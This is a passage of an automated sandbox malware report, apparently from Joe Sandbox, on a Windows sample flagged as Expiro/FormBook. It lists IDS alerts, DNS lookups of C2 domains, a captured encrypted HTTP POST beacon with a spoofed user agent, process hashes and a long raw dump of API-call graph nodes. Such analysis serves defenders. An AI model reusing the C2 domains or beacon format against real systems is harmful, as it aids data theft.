                  2025-01-10T22:55:57.553921+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 49704 | 54.244.188.177 | 80 | TCP
                  2025-01-10T22:55:57.680935+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49704 | TCP
                  2025-01-10T22:55:57.680935+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49704 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 10, 2025 22:55:56.841007948 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177
                  Jan 10, 2025 22:55:56.845947981 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5
                  Jan 10, 2025 22:55:56.846029043 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177
                  Jan 10, 2025 22:55:56.846955061 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177
                  Jan 10, 2025 22:55:56.846982956 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177
                  Jan 10, 2025 22:55:56.851819992 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5
                  Jan 10, 2025 22:55:56.851834059 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5
                  Jan 10, 2025 22:55:57.553577900 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5
                  Jan 10, 2025 22:55:57.553730011 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5
                  Jan 10, 2025 22:55:57.553920984 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177
                  Jan 10, 2025 22:55:57.675823927 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177
                  Jan 10, 2025 22:55:57.680934906 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 10, 2025 22:55:56.684689045 CET | 64537 | 53 | 192.168.2.5 | 1.1.1.1
                  Jan 10, 2025 22:55:56.692035913 CET | 53 | 64537 | 1.1.1.1 | 192.168.2.5
                  Jan 10, 2025 22:55:57.789408922 CET | 58281 | 53 | 192.168.2.5 | 1.1.1.1
                  Jan 10, 2025 22:55:57.976327896 CET | 53 | 58281 | 1.1.1.1 | 192.168.2.5
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jan 10, 2025 22:55:56.684689045 CET | 192.168.2.5 | 1.1.1.1 | 0x2ae5 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
                  Jan 10, 2025 22:55:57.789408922 CET | 192.168.2.5 | 1.1.1.1 | 0x3f9 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jan 10, 2025 22:55:56.692035913 CET | 1.1.1.1 | 192.168.2.5 | 0x2ae5 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
                  Jan 10, 2025 22:55:57.976327896 CET | 1.1.1.1 | 192.168.2.5 | 0x3f9 | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
                  • pywolwnvd.biz
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.5 | 49704 | 54.244.188.177 | 80 | 5036 | C:\Users\user\Desktop\UaOJAOMxcU.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jan 10, 2025 22:55:56.846955061 CET | 353 | OUT | POST /rhimsaly HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: pywolwnvd.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 804
                  Jan 10, 2025 22:55:56.846982956 CET | 804 | OUT | Data Raw: cb a4 38 90 fb 50 c1 90 18 03 00 00 0c 71 ae 54 6f 23 73 11 d9 ae 51 38 02 b5 71 a2 2c 7b 19 f8 48 38 d7 9d a9 33 57 d9 8e 12 86 67 50 f0 dd c9 20 cb ab 17 d1 16 41 66 12 0d 7c e7 9d 67 bd 67 f6 7d 2d 6a 5e 95 24 c3 07 17 fc 10 c9 3c ea ff 5c 48
                  Data Ascii: 8PqTo#sQ8q,{H83WgP Af|gg}-j^$<\H&]YU}J(^SZ/}Uq=D)[Pdh5JF-C/!z7g?#Y#Vj'RZ]Eg2X%S9'0*a`XUZ$D4q#/
                  Jan 10, 2025 22:55:57.553577900 CET | 413 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Fri, 10 Jan 2025 21:55:57 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: btst=0b3c6bfe9027852d4c1a42f13259ae8a|8.46.123.189|1736546157|1736546157|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                  Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Target ID:0
                  Start time:16:55:54
                  Start date:10/01/2025
                  Path:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UaOJAOMxcU.exe"
                  Imagebase:0x400000
                  File size:1'777'664 bytes
                  MD5 hash:97A3CC0911D35ED963283AFB08B1E671
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:16:55:54
                  Start date:10/01/2025
                  Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Imagebase:0x400000
                  File size:1'658'880 bytes
                  MD5 hash:717063427E4960E26A9AEEA93FFA8BC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:16:55:55
                  Start date:10/01/2025
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UaOJAOMxcU.exe"
                  Imagebase:0x510000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:16:55:55
                  Start date:10/01/2025
                  Path:C:\Windows\System32\alg.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\alg.exe
                  Imagebase:0x140000000
                  File size:1'594'368 bytes
                  MD5 hash:791FE83149B027ED288BF7B3D73209AA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:false

                    Execution Graph

                    Execution Coverage:4%
                    Dynamic/Decrypted Code Coverage:6.7%
                    Signature Coverage:6.5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:60
                    execution_graph: node/edge dump behind the interactive call-graph rendering (node id, function address, and the Windows APIs each node calls, e.g. VirtualAlloc/VirtualFree, StrStrIW, OpenServiceW/StartServiceW/ChangeServiceConfigW/CloseServiceHandle, CreateFileW/GetFileSizeEx/GetFileTime/SetFilePointerEx, lstrcmpiW, GetPEB, Sleep); not reproducible as text.
109226->109373 109411 465937 68 API calls 109226->109411 109412 4089b3 69 API calls Mailbox 109226->109412 109413 409d3c 60 API calls Mailbox 109226->109413 109230 420db6 Mailbox 59 API calls 109227->109230 109228 4100eb 109228->109218 109371 4082df 59 API calls Mailbox 109228->109371 109230->109200 109232->109226 109233 410162 109232->109233 109398 409c90 59 API calls Mailbox 109232->109398 109233->109144 109234->109138 109235->109144 109236->109144 109237->109152 109241 420dbe 109238->109241 109240 420dd8 109240->109152 109241->109240 109243 420ddc std::exception::exception 109241->109243 109249 42571c 109241->109249 109266 4233a1 DecodePointer 109241->109266 109267 42859b RaiseException 109243->109267 109245 420e06 109268 4284d1 58 API calls _free 109245->109268 109247 420e18 109247->109152 109248->109152 109250 425797 109249->109250 109257 425728 109249->109257 109275 4233a1 DecodePointer 109250->109275 109252 42579d 109276 428b28 58 API calls __getptd_noexit 109252->109276 109255 42575b RtlAllocateHeap 109255->109257 109265 42578f 109255->109265 109257->109255 109258 425733 109257->109258 109259 425783 109257->109259 109263 425781 109257->109263 109272 4233a1 DecodePointer 109257->109272 109258->109257 109269 42a16b 58 API calls 2 library calls 109258->109269 109270 42a1c8 58 API calls 7 library calls 109258->109270 109271 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109258->109271 109273 428b28 58 API calls __getptd_noexit 109259->109273 109274 428b28 58 API calls __getptd_noexit 109263->109274 109265->109241 109266->109241 109267->109245 109268->109247 109269->109258 109270->109258 109272->109257 109273->109263 109274->109265 109275->109252 109276->109265 109278 40818f 109277->109278 109281 4081aa 109277->109281 109426 407e4f 109278->109426 109280 408197 CharUpperBuffW 109280->109281 109281->109156 109283 40f251 109282->109283 109284 40f272 109283->109284 109430 469e4a 89 API calls 4 library calls 109283->109430 109284->109162 
109287 40838d 109286->109287 109288 43edbd 109286->109288 109289 420db6 Mailbox 59 API calls 109287->109289 109291 408394 109289->109291 109290 4083b5 109290->109176 109290->109180 109291->109290 109431 408634 59 API calls Mailbox 109291->109431 109294 444cc3 109293->109294 109306 4109f5 109293->109306 109494 469e4a 89 API calls 4 library calls 109294->109494 109296 410ce4 109297 410cfa 109296->109297 109491 411070 10 API calls Mailbox 109296->109491 109297->109205 109299 410ee4 109299->109297 109301 410ef1 109299->109301 109492 411093 341 API calls Mailbox 109301->109492 109302 410a4b PeekMessageW 109323 410a05 Mailbox 109302->109323 109305 410ef8 LockWindowUpdate DestroyWindow GetMessageW 109305->109297 109308 410f2a 109305->109308 109306->109323 109495 409e5d 60 API calls 109306->109495 109496 456349 341 API calls 109306->109496 109307 444e81 Sleep 109307->109323 109310 445c58 TranslateMessage DispatchMessageW GetMessageW 109308->109310 109310->109310 109311 445c88 109310->109311 109311->109297 109312 409e5d 60 API calls 109312->109323 109313 410e43 PeekMessageW 109313->109323 109314 410ea5 TranslateMessage DispatchMessageW 109314->109313 109315 444d50 TranslateAcceleratorW 109315->109313 109315->109323 109316 44581f WaitForSingleObject 109316->109323 109324 44583c GetExitCodeProcess CloseHandle 109316->109324 109318 420db6 59 API calls Mailbox 109318->109323 109319 410d13 timeGetTime 109319->109323 109320 410e5f Sleep 109330 410e70 Mailbox 109320->109330 109321 408047 59 API calls 109321->109323 109323->109296 109323->109302 109323->109307 109323->109312 109323->109313 109323->109314 109323->109315 109323->109316 109323->109318 109323->109319 109323->109320 109323->109321 109325 410f95 109323->109325 109326 445af8 Sleep 109323->109326 109328 40b73c 314 API calls 109323->109328 109323->109330 109332 410f4e timeGetTime 109323->109332 109353 40fce0 314 API calls 109323->109353 109356 469e4a 89 API calls 109323->109356 109358 4089b3 69 API calls 109323->109358 
109359 409c90 59 API calls Mailbox 109323->109359 109360 409ea0 314 API calls 109323->109360 109361 4084c0 69 API calls 109323->109361 109363 45617e 59 API calls Mailbox 109323->109363 109364 4455d5 VariantClear 109323->109364 109365 44566b VariantClear 109323->109365 109366 408cd4 59 API calls Mailbox 109323->109366 109367 445419 VariantClear 109323->109367 109368 456e8f 59 API calls 109323->109368 109369 407de1 59 API calls 109323->109369 109432 40e420 109323->109432 109439 40e6a0 109323->109439 109470 40f460 109323->109470 109490 4031ce IsDialogMessageW GetClassLongW 109323->109490 109497 486018 59 API calls 109323->109497 109498 469a15 59 API calls Mailbox 109323->109498 109499 45d4f2 59 API calls 109323->109499 109500 409837 109323->109500 109518 4560ef 59 API calls 2 library calls 109323->109518 109519 408401 59 API calls 109323->109519 109520 4082df 59 API calls Mailbox 109323->109520 109324->109325 109325->109205 109326->109330 109328->109323 109330->109323 109330->109325 109331 42049f timeGetTime 109330->109331 109335 445b8f GetExitCodeProcess 109330->109335 109337 40b7dd 109 API calls 109330->109337 109342 485f25 110 API calls 109330->109342 109343 445874 109330->109343 109344 445078 Sleep 109330->109344 109345 445c17 Sleep 109330->109345 109521 407667 109330->109521 109526 462408 60 API calls 109330->109526 109527 409e5d 60 API calls 109330->109527 109528 407de1 109330->109528 109532 4089b3 69 API calls Mailbox 109330->109532 109533 40b73c 341 API calls 109330->109533 109534 4564da 60 API calls 109330->109534 109535 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109330->109535 109536 463c55 66 API calls Mailbox 109330->109536 109331->109330 109493 409e5d 60 API calls 109332->109493 109338 445ba5 WaitForSingleObject 109335->109338 109339 445bbb CloseHandle 109335->109339 109337->109330 109338->109323 109338->109339 109339->109330 109342->109330 109343->109325 109344->109323 109345->109323 109353->109323 
109356->109323 109358->109323 109359->109323 109360->109323 109361->109323 109363->109323 109364->109323 109365->109323 109366->109323 109367->109323 109368->109323 109369->109323 109370->109228 109371->109232 109372->109226 109373->109226 109375 409ebf 109374->109375 109394 409eed Mailbox 109374->109394 109377 420db6 Mailbox 59 API calls 109375->109377 109376 422d40 67 API calls __cinit 109376->109394 109377->109394 109378 40b475 109379 408047 59 API calls 109378->109379 109392 40a057 109379->109392 109380 40b47a 109381 440055 109380->109381 109396 4409e5 109380->109396 110917 469e4a 89 API calls 4 library calls 109381->110917 109382 407667 59 API calls 109382->109394 109384 420db6 59 API calls Mailbox 109384->109394 109387 408047 59 API calls 109387->109394 109388 440064 109388->109162 109391 456e8f 59 API calls 109391->109394 109392->109162 109393 4409d6 110919 469e4a 89 API calls 4 library calls 109393->110919 109394->109376 109394->109378 109394->109380 109394->109381 109394->109382 109394->109384 109394->109387 109394->109391 109394->109392 109394->109393 109397 40a55a 109394->109397 110915 40c8c0 341 API calls 2 library calls 109394->110915 110916 40b900 60 API calls Mailbox 109394->110916 110920 469e4a 89 API calls 4 library calls 109396->110920 110918 469e4a 89 API calls 4 library calls 109397->110918 109398->109232 109399->109158 109400->109174 109401->109185 109402->109174 109403->109174 109404->109173 109405->109181 109406->109182 109407->109182 109408->109184 109409->109188 109410->109226 109411->109226 109412->109226 109413->109226 109415 4084cb 109414->109415 109417 4084f2 109415->109417 110921 4089b3 69 API calls Mailbox 109415->110921 109417->109210 109418->109174 109419->109212 109421 408052 109420->109421 109422 40805a 109420->109422 109423 407f77 59 API calls 109421->109423 109422->109220 109423->109422 109424->109165 109425->109174 109427 407e62 109426->109427 109429 407e5f _memmove 109426->109429 109428 420db6 Mailbox 59 API calls 
109427->109428 109428->109429 109429->109280 109430->109284 109431->109290 109433 40e451 109432->109433 109434 40e43d 109432->109434 109538 469e4a 89 API calls 4 library calls 109433->109538 109537 40df00 341 API calls 2 library calls 109434->109537 109437 40e448 109437->109323 109438 443aa4 109438->109438 109440 40e6d5 109439->109440 109441 443aa9 109440->109441 109444 40e73f 109440->109444 109454 40e799 109440->109454 109442 409ea0 341 API calls 109441->109442 109443 443abe 109442->109443 109469 40e970 Mailbox 109443->109469 109543 469e4a 89 API calls 4 library calls 109443->109543 109447 407667 59 API calls 109444->109447 109444->109454 109445 407667 59 API calls 109445->109454 109448 443b04 109447->109448 109544 422d40 109448->109544 109449 422d40 __cinit 67 API calls 109449->109454 109450 443b26 109450->109323 109452 4084c0 69 API calls 109452->109469 109453 409ea0 341 API calls 109453->109469 109454->109445 109454->109449 109454->109450 109455 40e95a 109454->109455 109454->109469 109455->109469 109547 469e4a 89 API calls 4 library calls 109455->109547 109460 408d40 59 API calls 109460->109469 109462 469e4a 89 API calls 109462->109469 109466 443e25 109466->109323 109467 40f195 109551 469e4a 89 API calls 4 library calls 109467->109551 109468 40ea78 109468->109323 109469->109452 109469->109453 109469->109460 109469->109462 109469->109467 109469->109468 109539 407f77 109469->109539 109548 456e8f 59 API calls 109469->109548 109549 47c5c3 341 API calls 109469->109549 109550 47b53c 341 API calls Mailbox 109469->109550 109552 409c90 59 API calls Mailbox 109469->109552 109553 4793c6 341 API calls Mailbox 109469->109553 109471 40f650 109470->109471 109472 40f4ba 109470->109472 109475 407de1 59 API calls 109471->109475 109473 40f4c6 109472->109473 109474 44441e 109472->109474 109733 40f290 341 API calls 2 library calls 109473->109733 109735 47bc6b 109474->109735 109481 40f58c Mailbox 109475->109481 109478 44442c 109482 40f630 109478->109482 109775 469e4a 89 API calls 4 
library calls 109478->109775 109480 40f4fd 109480->109478 109480->109481 109480->109482 109484 40f5e3 109481->109484 109632 47445a 109481->109632 109641 46cb7a 109481->109641 109721 47df37 109481->109721 109724 404e4a 109481->109724 109730 463c37 109481->109730 109482->109323 109484->109482 109734 409c90 59 API calls Mailbox 109484->109734 109490->109323 109491->109299 109492->109305 109493->109323 109494->109306 109495->109306 109496->109306 109497->109323 109498->109323 109499->109323 109501 409851 109500->109501 109510 40984b 109500->109510 109502 409857 __itow 109501->109502 109503 409899 109501->109503 109504 43f5d3 __i64tow 109501->109504 109509 43f4da 109501->109509 109506 420db6 Mailbox 59 API calls 109502->109506 110913 423698 83 API calls 3 library calls 109503->110913 109504->109504 109508 409871 109506->109508 109508->109510 109512 407de1 59 API calls 109508->109512 109511 420db6 Mailbox 59 API calls 109509->109511 109516 43f552 Mailbox _wcscpy 109509->109516 109510->109323 109513 43f51f 109511->109513 109512->109510 109514 420db6 Mailbox 59 API calls 109513->109514 109515 43f545 109514->109515 109515->109516 109517 407de1 59 API calls 109515->109517 110914 423698 83 API calls 3 library calls 109516->110914 109517->109516 109518->109323 109519->109323 109520->109323 109522 420db6 Mailbox 59 API calls 109521->109522 109523 407688 109522->109523 109524 420db6 Mailbox 59 API calls 109523->109524 109525 407696 109524->109525 109525->109330 109526->109330 109527->109330 109529 407df0 __NMSG_WRITE _memmove 109528->109529 109530 420db6 Mailbox 59 API calls 109529->109530 109531 407e2e 109530->109531 109531->109330 109532->109330 109533->109330 109534->109330 109535->109330 109536->109330 109537->109437 109538->109438 109540 407f9a _memmove 109539->109540 109541 407f87 109539->109541 109540->109469 109541->109540 109542 420db6 Mailbox 59 API calls 109541->109542 109542->109540 109543->109469 109554 422c44 109544->109554 109546 422d4b 109546->109454 
109547->109469 109548->109469 109549->109469 109550->109469 109551->109466 109552->109469 109553->109469 109555 422c50 _raise 109554->109555 109562 423217 109555->109562 109561 422c77 _raise 109561->109546 109579 429c0b 109562->109579 109564 422c59 109565 422c88 DecodePointer DecodePointer 109564->109565 109566 422c65 109565->109566 109567 422cb5 109565->109567 109576 422c82 109566->109576 109567->109566 109625 4287a4 59 API calls _raise 109567->109625 109569 422d18 EncodePointer EncodePointer 109569->109566 109570 422cec 109570->109566 109574 422d06 EncodePointer 109570->109574 109627 428864 61 API calls 2 library calls 109570->109627 109571 422cc7 109571->109569 109571->109570 109626 428864 61 API calls 2 library calls 109571->109626 109574->109569 109575 422d00 109575->109566 109575->109574 109628 423220 109576->109628 109580 429c2f EnterCriticalSection 109579->109580 109581 429c1c 109579->109581 109580->109564 109586 429c93 109581->109586 109583 429c22 109583->109580 109610 4230b5 58 API calls 3 library calls 109583->109610 109587 429c9f _raise 109586->109587 109588 429cc0 109587->109588 109589 429ca8 109587->109589 109594 429ce1 _raise 109588->109594 109614 42881d 58 API calls 2 library calls 109588->109614 109611 42a16b 58 API calls 2 library calls 109589->109611 109591 429cad 109612 42a1c8 58 API calls 7 library calls 109591->109612 109593 429cd5 109596 429ceb 109593->109596 109597 429cdc 109593->109597 109594->109583 109600 429c0b __lock 58 API calls 109596->109600 109615 428b28 58 API calls __getptd_noexit 109597->109615 109598 429cb4 109613 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109598->109613 109602 429cf2 109600->109602 109604 429d17 109602->109604 109605 429cff 109602->109605 109617 422d55 109604->109617 109616 429e2b InitializeCriticalSectionAndSpinCount 109605->109616 109608 429d0b 109623 429d33 LeaveCriticalSection _doexit 109608->109623 109611->109591 109612->109598 109614->109593 109615->109594 109616->109608 
109618 422d5e RtlFreeHeap 109617->109618 109622 422d87 _free 109617->109622 109619 422d73 109618->109619 109618->109622 109624 428b28 58 API calls __getptd_noexit 109619->109624 109621 422d79 GetLastError 109621->109622 109622->109608 109623->109594 109624->109621 109625->109571 109626->109570 109627->109575 109631 429d75 LeaveCriticalSection 109628->109631 109630 422c87 109630->109561 109631->109630 109633 409837 84 API calls 109632->109633 109634 474494 109633->109634 109776 406240 109634->109776 109636 4744a4 109637 4744c9 109636->109637 109638 409ea0 341 API calls 109636->109638 109640 4744cd 109637->109640 109801 409a98 109637->109801 109638->109637 109640->109484 109642 407667 59 API calls 109641->109642 109643 46cbaf 109642->109643 109644 407667 59 API calls 109643->109644 109645 46cbb8 109644->109645 109646 46cbcc 109645->109646 110050 409b3c 109645->110050 109648 409837 84 API calls 109646->109648 109649 46cbe9 109648->109649 109650 46ccea 109649->109650 109651 46cc0b 109649->109651 109656 46cd1a Mailbox 109649->109656 109854 404ddd 109650->109854 109652 409837 84 API calls 109651->109652 109654 46cc17 109652->109654 109657 408047 59 API calls 109654->109657 109656->109484 109660 46cc23 109657->109660 109658 46cd16 109658->109656 109659 407667 59 API calls 109658->109659 109662 46cd4b 109659->109662 109665 46cc37 109660->109665 109666 46cc69 109660->109666 109661 404ddd 136 API calls 109661->109658 109663 407667 59 API calls 109662->109663 109664 46cd54 109663->109664 109668 407667 59 API calls 109664->109668 109669 408047 59 API calls 109665->109669 109667 409837 84 API calls 109666->109667 109670 46cc76 109667->109670 109671 46cd5d 109668->109671 109672 46cc47 109669->109672 109674 408047 59 API calls 109670->109674 109675 407667 59 API calls 109671->109675 110054 407cab 109672->110054 109677 46cc82 109674->109677 109678 46cd66 109675->109678 110061 464a31 GetFileAttributesW 109677->110061 109681 409837 84 API calls 109678->109681 109679 409837 84 API 
calls 109682 46cc5d 109679->109682 109684 46cd73 109681->109684 109685 407b2e 59 API calls 109682->109685 109683 46cc8b 109686 46cc9e 109683->109686 109689 4079f2 59 API calls 109683->109689 109878 40459b 109684->109878 109685->109666 109688 409837 84 API calls 109686->109688 109696 46cca4 109686->109696 109692 46cccb 109688->109692 109689->109686 110062 4637ef 75 API calls Mailbox 109692->110062 109696->109656 110790 47cadd 109721->110790 109723 47df47 109723->109484 109725 404e54 109724->109725 109727 404e5b 109724->109727 109726 4253a6 __fcloseall 83 API calls 109725->109726 109726->109727 109728 404e6a 109727->109728 109729 404e7b FreeLibrary 109727->109729 109728->109484 109729->109728 110901 46445a GetFileAttributesW 109730->110901 109733->109480 109734->109484 109736 47bc96 109735->109736 109737 47bcb0 109735->109737 110905 469e4a 89 API calls 4 library calls 109736->110905 110906 47a213 59 API calls Mailbox 109737->110906 109740 47bcbb 109741 409ea0 340 API calls 109740->109741 109742 47bd1c 109741->109742 109743 47bdae 109742->109743 109747 47bd5d 109742->109747 109768 47bca8 Mailbox 109742->109768 109744 47be04 109743->109744 109745 47bdb4 109743->109745 109746 409837 84 API calls 109744->109746 109744->109768 110908 46791a 59 API calls 109745->110908 109748 47be16 109746->109748 110907 4672df 59 API calls Mailbox 109747->110907 109750 407e4f 59 API calls 109748->109750 109753 47be3a CharUpperBuffW 109750->109753 109751 47bdd7 110909 405d41 59 API calls Mailbox 109751->110909 109758 47be54 109753->109758 109755 47bd8d 109757 40f460 340 API calls 109755->109757 109756 47bddf Mailbox 109762 40fce0 340 API calls 109756->109762 109757->109768 109759 47bea7 109758->109759 109760 47be5b 109758->109760 109761 409837 84 API calls 109759->109761 110910 4672df 59 API calls Mailbox 109760->110910 109763 47beaf 109761->109763 109762->109768 110911 409e5d 60 API calls 109763->110911 109766 47be89 109767 40f460 340 API calls 109766->109767 109767->109768 109768->109478 
109769 47beb9 109769->109768 109770 409837 84 API calls 109769->109770 109771 47bed4 109770->109771 110912 405d41 59 API calls Mailbox 109771->110912 109773 47bee4 109774 40fce0 340 API calls 109773->109774 109774->109768 109775->109482 109814 407a16 109776->109814 109778 40646a 109821 40750f 109778->109821 109780 406484 Mailbox 109780->109636 109783 43dff6 109834 45f8aa 91 API calls 4 library calls 109783->109834 109784 407d8c 59 API calls 109795 406265 109784->109795 109785 40750f 59 API calls 109785->109795 109789 43e004 109790 40750f 59 API calls 109789->109790 109791 43e01a 109790->109791 109791->109780 109792 406799 _memmove 109835 45f8aa 91 API calls 4 library calls 109792->109835 109793 43df92 109831 408029 109793->109831 109795->109778 109795->109783 109795->109784 109795->109785 109795->109792 109795->109793 109798 407e4f 59 API calls 109795->109798 109819 405f6c 60 API calls 109795->109819 109820 405d41 59 API calls Mailbox 109795->109820 109829 405e72 60 API calls 109795->109829 109830 407924 59 API calls 2 library calls 109795->109830 109796 43df9d 109800 420db6 Mailbox 59 API calls 109796->109800 109799 40643b CharUpperBuffW 109798->109799 109799->109795 109800->109792 109802 43f7d6 109801->109802 109803 409aa8 109801->109803 109806 43f7e7 109802->109806 109836 407bcc 109802->109836 109808 420db6 Mailbox 59 API calls 109803->109808 109845 407d8c 109806->109845 109807 43f7f1 109811 409ad4 109807->109811 109812 407667 59 API calls 109807->109812 109809 409abb 109808->109809 109809->109807 109810 409ac6 109809->109810 109810->109811 109813 407de1 59 API calls 109810->109813 109811->109640 109812->109811 109813->109811 109815 420db6 Mailbox 59 API calls 109814->109815 109816 407a3b 109815->109816 109817 408029 59 API calls 109816->109817 109818 407a4a 109817->109818 109818->109795 109819->109795 109820->109795 109822 4075af 109821->109822 109828 407522 _memmove 109821->109828 109824 420db6 Mailbox 59 API calls 109822->109824 109823 420db6 Mailbox 59 API 
calls 109825 407529 109823->109825 109824->109828 109826 420db6 Mailbox 59 API calls 109825->109826 109827 407552 109825->109827 109826->109827 109827->109780 109828->109823 109829->109795 109830->109795 109832 420db6 Mailbox 59 API calls 109831->109832 109833 408033 109832->109833 109833->109796 109834->109789 109835->109780 109837 407c45 109836->109837 109838 407bd8 __NMSG_WRITE 109836->109838 109850 407d2c 109837->109850 109840 407c13 109838->109840 109841 407bee 109838->109841 109843 408029 59 API calls 109840->109843 109849 407f27 59 API calls Mailbox 109841->109849 109844 407bf6 _memmove 109843->109844 109844->109806 109846 407da6 109845->109846 109847 407d99 109845->109847 109848 420db6 Mailbox 59 API calls 109846->109848 109847->109807 109848->109847 109849->109844 109851 407d43 _memmove 109850->109851 109852 407d3a 109850->109852 109851->109844 109852->109851 109853 407e4f 59 API calls 109852->109853 109853->109851 110063 404bb5 109854->110063 109859 43d8e6 109862 404e4a 84 API calls 109859->109862 109860 404e08 LoadLibraryExW 110073 404b6a 109860->110073 109864 43d8ed 109862->109864 109866 404b6a 3 API calls 109864->109866 109868 43d8f5 109866->109868 109867 404e2f 109867->109868 109869 404e3b 109867->109869 110099 404f0b 109868->110099 109870 404e4a 84 API calls 109869->109870 109872 404e40 109870->109872 109872->109658 109872->109661 109875 43d91c 110107 404ec7 109875->110107 109879 407667 59 API calls 109878->109879 109880 4045b1 109879->109880 109881 407667 59 API calls 109880->109881 109882 4045b9 109881->109882 109883 407667 59 API calls 109882->109883 109884 4045c1 109883->109884 109885 407667 59 API calls 109884->109885 109886 4045c9 109885->109886 109887 43d4d2 109886->109887 109888 4045fd 109886->109888 109889 408047 59 API calls 109887->109889 109890 40784b 59 API calls 109888->109890 109891 43d4db 109889->109891 109892 40460b 109890->109892 109893 407d8c 59 API calls 109891->109893 109894 407d2c 59 API calls 109892->109894 109896 404640 
109893->109896 109895 404615 109894->109895 109895->109896 109897 40784b 59 API calls 109895->109897 109898 404680 109896->109898 109900 40465f 109896->109900 109911 43d4fb 109896->109911 109901 404636 109897->109901 110394 40784b 109898->110394 109905 4079f2 59 API calls 109900->109905 109903 43d5cb 109911->109903 109913 43d5b4 109911->109913 109926 43d532 109911->109926 109913->109903 110051 409b52 110050->110051 110052 409b4d 110050->110052 110051->109646 110052->110051 110784 42358a 59 API calls 110052->110784 110055 43ed4a 110054->110055 110056 407cbf 110054->110056 110057 408029 59 API calls 110055->110057 110785 407c50 110056->110785 110060 43ed55 __NMSG_WRITE _memmove 110057->110060 110059 407cca 110059->109679 110061->109683 110062->109696 110112 404c03 110063->110112 110066 404bdc 110067 404bf5 110066->110067 110068 404bec FreeLibrary 110066->110068 110070 42525b 110067->110070 110068->110067 110069 404c03 2 API calls 110069->110066 110116 425270 110070->110116 110072 404dfc 110072->109859 110072->109860 110197 404c36 110073->110197 110076 404ba1 FreeLibrary 110077 404baa 110076->110077 110080 404c70 110077->110080 110078 404c36 2 API calls 110079 404b8f 110078->110079 110079->110076 110079->110077 110081 420db6 Mailbox 59 API calls 110080->110081 110082 404c85 110081->110082 110201 40522e 110082->110201 110084 404c91 _memmove 110085 404ccc 110084->110085 